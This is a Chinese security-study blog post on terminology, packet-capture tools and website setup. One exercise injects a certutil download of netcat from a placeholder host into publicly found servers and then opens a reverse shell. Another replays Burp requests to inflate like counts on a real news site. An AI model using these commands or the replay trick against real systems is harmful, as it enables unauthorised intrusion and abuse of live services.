安全基础~信息收集1

这篇具有很好参考价值的文章主要介绍了安全基础~信息收集1。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

常见名词

前后端,POC/EXP,Payload/Shellcode,后门/Webshell,木马/病毒,

反弹,回显,跳板,黑白盒测试,暴力破解,社会工程学,撞库,ATT&CK等

名词解释

小实战

  • fofa暗网浏览器中,使用"pikachu" && country="CN" && title="Get the pikachu"命令,查询在线pikachu服务器,进入测试命令执行漏洞

    安全基础~信息收集1,安全学习,安全

  • 执行命令,查看回显

    安全基础~信息收集1,安全学习,安全

  • 查看本机是哪种服务器,接着使用下载命令,将远程连接nc下载到本地,并命名为n.exe
    文档下载命令转换

    安全基础~信息收集1,安全学习,安全

  • 选择CMD下载命令,复制命令,使用命令执行127.0.0.1 & certutil.exe -urlcache -split -f http://www.xxx.com:80/nc.exe n.exe,出现以下,表示下载完成,也可以使用dir查看
    安全基础~信息收集1,安全学习,安全
    安全基础~信息收集1,安全学习,安全

  • 接着在想要反弹shell的电脑上使用命令 nc -lvvp 端口号(5566)监听端口;在肉机上用nc -e /bin/sh(或cmd) 目标ip 5566;成功连接上远端服务器。
    安全基础~信息收集1,安全学习,安全

网站搭建

Web应用&架构搭建&漏洞概念&HTTP

Web应用&架构
理解不同WEB应用组成角色功能架构:
开发语言,程序源码,中间件容器,数据库类型,服务器操作系统,第三方软件等
开发语言:asp,php,aspx,jsp,java,python,ruby,go,html,javascript等
程序源码:根据开发语言分类;应用类型分类;开源CMS分类;开发框架分类等
中间件容器:IIS,Apache,Nginx,Tomcat,Weblogic,Jboos,glasshfish等
数据库类型:Access,Mysql,Mssql,Oracle,db2,Sybase,Redis,MongoDB等
服务器操作系统:Windows系列,Linux系列,Mac系列等
第三方软件:phpmyadmin,vs-ftpd,VNC,ELK,Openssh等

小实战

一个好玩的东西,新浪新闻点赞,在不登陆的情况下只能点赞一次,究其原因应该是浏览器前端问题,可以刷新页面继续点赞,也可以截取数据包,多次发送就能解决仅能发送一次的问题。

  • 已经点赞后,无论如何去点都无法再次增加点赞量,此时的点赞量为229。

安全基础~信息收集1,安全学习,安全

  • 开启burpsuite抓包,并右键送至中继器(repeater)
    安全基础~信息收集1,安全学习,安全

  • 关闭抓包,在repeater中继续send数据包,刷新网页查看点赞量,此时的点赞量已经到了250次了。
    安全基础~信息收集1,安全学习,安全

抓包模拟器

在PC端显现出来的浏览器与手机端浏览器显现出来的不同,使用burpsuite抓包,观看数据包的区别。

  • burpsuite中配置代理,其中127是本地浏览器抓包,10是对该计算机局域网内进行抓包(特指模拟器)
    安全基础~信息收集1,安全学习,安全
  • 模拟器更改配置,代理--手动代理服务器主机名改为本机IP地址,dialing端口与上述一致,为8888,如下:
    安全基础~信息收集1,安全学习,安全
  • 分别在PC端与模拟器上抓包,让数据流经burp抓包工具,如下:
    安全基础~信息收集1,安全学习,安全

通过User-Agent可知其发生差异的原因

状态码返回值

参考文章1
参考文章2
400:发送请求有语法错误
403:文件夹存在,没有权限访问
404:访问资源不存在(文件/文件夹)
3xx:跳转,处置过程,判断可有可无
    重定向(302)
5xx:内部错误,服务器问题,判断可有可无
    500.服务器内部异常
    504.服务器请求超时,没有返回结果

在对目标进行扫描时,尽量勾选它们,为了不放过任何结果,需要进行扫描
购买快代理,可以随时更换ip,防止ip被封禁,也可以实现VPN的功效。

网站搭建

安装的前提条件:

  • 拥有一台自己的服务器和属于自己的域名(域名要进行备案,如果不备案只能在大陆之外进行访问)
  • 服务器安装宝塔集成环境,方便操作使用
  • 选用远程连接工具,可以使用Windows自带的远程连接,也可以使用FinalShell进行连接,在远程服务器上进行操作

选择安装
选用Windows搭建:

  • 使用远端mstsc进行搭建,域名没有在国内备案,在阿里云选用大陆之外的云服务器
    选用按量收费,双核4G,服务器选用Windows版本
    安全基础~信息收集1,安全学习,安全
  • 确认下单之后,配置安全组,配置服务器密码,这些后期都能进行配置
    安全基础~信息收集1,安全学习,安全
  • 在服务器上下载宝塔,需要注册,在域名处提前配置好,将域名访问映射到服务器的ip,宝塔账号密码是随机的
    安全基础~信息收集1,安全学习,安全
  • 直接关掉该页面,会出现控制面板工具,复制面板地址到本机浏览器,开始网站的部署。
    安全基础~信息收集1,安全学习,安全
  • 进入以下界面,可以选择傻瓜式安装,也可以自己进行配置安装,在软件商店中选择。
    安全基础~信息收集1,安全学习,安全
    Win参考连接
    Linux参考连接

WEB应用安全漏洞

Web应用安全漏洞分类
SQL注入,文件安全,RCE执行,XSS跨站,CSRF/SSRF/CRLF,
反序列化,逻辑越权,未授权访问,XXE/XML,弱口令安全等

安全漏洞解释

数据包&封包&信息收集

参考连接

抓包的意义:     在我们安全测试中,对方可能会提供相对应的ip 地址,域名等等,那么有的应用是不会给你的,当在你测试的时候是不知道对方的目标名字什么的,那么我们就可以通过抓取数据包来获得你想要的信息,例如,对方主机/ip,或者与其相关的信息。

抓包的对象: 那么抓包他主要是针对协议去抓取的,根据不同的协议配对不同的抓包工具,就好比我们的网站他可以用BURP抓包工具,那么我们的APP或者小程序,它就不行了我们的BURP就抓取不到,为什么,因为我们的APP/小程序他走的不是HTTP协议的,所有抓取不到。

抓包的协议:     抓包的协议呢,就是我们的APP,它也可以是HTTP协议的走向,因为我们的HTML5就能做出APP,那么我们HTML5他的走向协议就是http协议,那个APP点开其实就是打开网站了,你留心可以发现,网站有一些网站和我们点开APP十分像

抓包的支持:     其实就是目标他支持哪些抓包工具,支持哪些协议

封包的意义:     封包他就能自定义我们的一个数据包,封包技术说简单也不简单,就是将一系列操作封装为数据包,方便使用,很多我们的外挂都用到封包技术,就相当于说你自定义一个数据包封装发送给服务器

参考点

Fiddler:
    是一个http协议调试代理工具,它能够记录并检查所有你的电脑和互联网之间的http通讯,设置断点,查看所有的“进出”Fiddler的数据(指cookie,html,js,css等文件)。 Fiddler 要比其他的网络调试器要更加简单,因为它不仅仅暴露http通讯还提供了一个用户友好的格式。

手机证书安装,需要将防火墙关闭,安装证书步骤参考
安全基础~信息收集1,安全学习,安全

Charles:
    是一个HTTP代理服务器,HTTP监视器,反转代理服务器,当浏览器连接Charles的代理访问互联网时,Charles可以监控浏览器发送和接收的所有数据。它允许一个开发者查看所有连接互联网的HTTP通信,这些包括request, response和HTTP headers (包含cookies与caching信息)。

    在模拟器中添加证书,help -->SSLproxying --> save Charles root certificate,保存之后,在模拟器中保存到文件夹中,接着设置-安全-(加密与凭据)用户凭据-从存储设备安装 / 设置-WALN-更多WALN设置-安装证书,接着会让输入密码,安装就能抓包。

抓取的包全部出现unknow的解决方法
proxy --> SSL Proxying Settings --> Add
来添加主机和端口,
如果个别情况出现unknow,可能是本身抓包软件存在个别漏抓问题。可以忽略
安全基础~信息收集1,安全学习,安全安全基础~信息收集1,安全学习,安全
安全基础~信息收集1,安全学习,安全
从左到右分别为:

(1)清除当前会话
(2)开始记录
(3)开启SSL代理
(4)开始限流/停止限流
(5)开始断点/停止断点
(6)根据所写内容撰写新请求
(7)重发选定请求
(8)工具
(9)设置

Charles 激活码在线计算器
ios配置代理
ios下载证书问题
burp+逍遥模拟器 app抓包

TCPDump:
    是可以将网络中传送的数据包完全截获下来提供分析。它支持针对网络层、协议、主机、网络或端口的过滤,并提供and、or、not等逻辑语句来帮助你去掉无用的信息。

BurpSuite:
    是用于攻击web 应用程序的集成平台,包含了许多工具。Burp Suite为这些工具设计了许多接口,以加快攻击应用程序的过程。所有工具都共享一个请求,并能处理对应的HTTP 消息、持久性、认证、代理、日志、警报。

Wireshark:
    是一个网络封包分析软件。网络封包分析软件的功能是截取网络封包,并尽可能显示出最为详细的网络封包资料。Wireshark使用WinPCAP作为接口,直接与网卡进行数据报文交换。

WireShark使用教程

科来网络分析系统:
    是一款由科来软件全自主研发,并拥有全部知识产品的网络分析产品。该系统具有行业领先的专家分析技术,通过捕获并分析网络中传输的底层数据包,对网络故障、网络安全以及网络性能进行全面分析,从而快速排查网络中出现或潜在的故障、安全及性能问题。

WPE&封包分析:
    是强大的网络封包编辑器,wpe可以截取网络上的信息,修改封包数据,是外挂制作的常用工具。一般在安全测试中可用来调试数据通讯地址。

封包拦截器
封包监听工具

Charles (茶杯)
https://blog.csdn.net/weixin_45459427/article/details/108393878

Fidder
https://blog.csdn.net/weixin_45043349/article/details/120088449

BurpSuite
https://blog.csdn.net/qq_36658099/article/details/81487491文章来源地址https://www.toymoban.com/news/detail-762689.html

到了这里,关于安全基础~信息收集1的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 【网络安全-信息收集】网络安全之信息收集和信息收集工具讲解(提供工具)

    分享一个非常详细的网络安全笔记,是我学习网安过程中用心写的,可以点开以下链接获取: 超详细的网络安全笔记 工具下载百度网盘链接(包含所有用到的工具): 百度网盘 请输入提取码 百度网盘为您提供文件的网络备份、同步和分享服务。空间大、速度快、安全稳固,

    2024年02月08日
    浏览(50)
  • 网络安全信息收集初探之域名信息收集

    扫描单个域名 批量扫描域名 oneforall 额外参数 ![在这里插入图片描述](https://img-blog.csdnimg.cn/615763f979ea453091ad715f69980555.png https://crt.sh/ https://search.censys.io/

    2024年02月13日
    浏览(53)
  • 内网安全 信息收集(收集内网计算机的所有信息 进行攻击.)

    在   渗透测试人员 进入一个内 网后,面对的是一片 “ 未知的区域 ”,所以 渗透测试人员首先会对当前所 处的网络环境进行判断,通常的判断分为三种. (1) 我是谁? —— 对计算机的角色进行判断. (2)我在哪? —— 对目前机器所处位置区域的判断。 (3)这是哪?

    2024年02月02日
    浏览(46)
  • 信息收集(Web 安全)

    渗透测试(Penetration Testing)是一种评估计算机系统、网络或应用程序安全性的方法。通过模拟攻击者的行为,渗透测试旨在发现系统中存在的安全漏洞和弱点,以便组织可以及时修复这些问题,从而提高其安全性 渗透测试一般的流程如下:        在这其中,想要做好渗透

    2024年01月18日
    浏览(44)
  • 【安全】二,主动信息收集

    特点 ​ 1,主动与目标网站/系统建立连接 ​ 2,会在目标网站上留下痕迹 ​ 3,会扫瞄发送不同的探测信息,根据返回的状态判断目标状态 ​ 4,尽量的使用代理或者第三方的控制电脑进行探测,主动探测用力被封ip 发现主机的过程 ​ 1,识别存活的主机,发现攻击目标 ​

    2024年03月19日
    浏览(42)
  • 内网安全信息收集

    “感谢您阅读本篇博客!如果您觉得本文对您有所帮助或启发,请不吝点赞和分享给更多的朋友。您的支持是我持续创作的动力,也欢迎留言交流,让我们一起探讨技术,共同成长!谢谢!🚀✨” 工作组 活动目录 DMZ 域Domain 域控制器DC 单域 父域 子域 域树 域林 域名服务器

    2024年03月26日
    浏览(48)
  • 网络安全之信息收集

    ​​​第一部分:被动信息收集 1、简介 ​ 在信息收集这块区域,我将其分为两部分:第一部分即被动信息收集,第二部分即主动信息收集。 ​ 对于标准的渗透测试人员来说,当明确目标做好规划之后首先应当进行的便是信息收集,那么在收集的过程中就需要考虑是否应该

    2024年02月04日
    浏览(53)
  • Web安全——信息收集上篇

    渗透的本质是信息收集 信息收集也叫做资产收集 信息收集是渗透测试的前期主要工作,是非常重要的环节,收集足够多的信息才能方便接下来的测试,信息收集主要是收集网站的域名信息、子域名信息、目标网站信息、目标网站真实IP、敏感/目录文件、开放端口和中间件信

    2024年02月10日
    浏览(40)
  • 网络安全信息收集工具

    常用信息收集网址 站长之家: http://whois.chinaz.com Bugscaner: http://whois.bugscaner.com 国外在线: https://bgp.he.net 小蓝本: https://www.xiaolanben.com/pc 企查查: https://www.qichacha.com 天眼查: https://www.tianyancha.com 爱企查: https://aiqicha.baidu.com Amass: https://github.com/OWASP/Amass Subfinder: https://github.com/projec

    2024年01月22日
    浏览(43)
  • 内网安全:域内信息收集

    目录 环境搭建 域基础知识 工作组和域 现实背景 常规信息收集 方式一:操作系统命令执行 常用总结 方式二:使用CS插件 关键信息收集 密码抓取测试 自动化信息收集工具 ADFind  BloodHound域分析使用(渗透流程信息) 从今天开始,将进入内网渗透的学习 测试环境:https://pan.ba

    2024年02月07日
    浏览(44)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包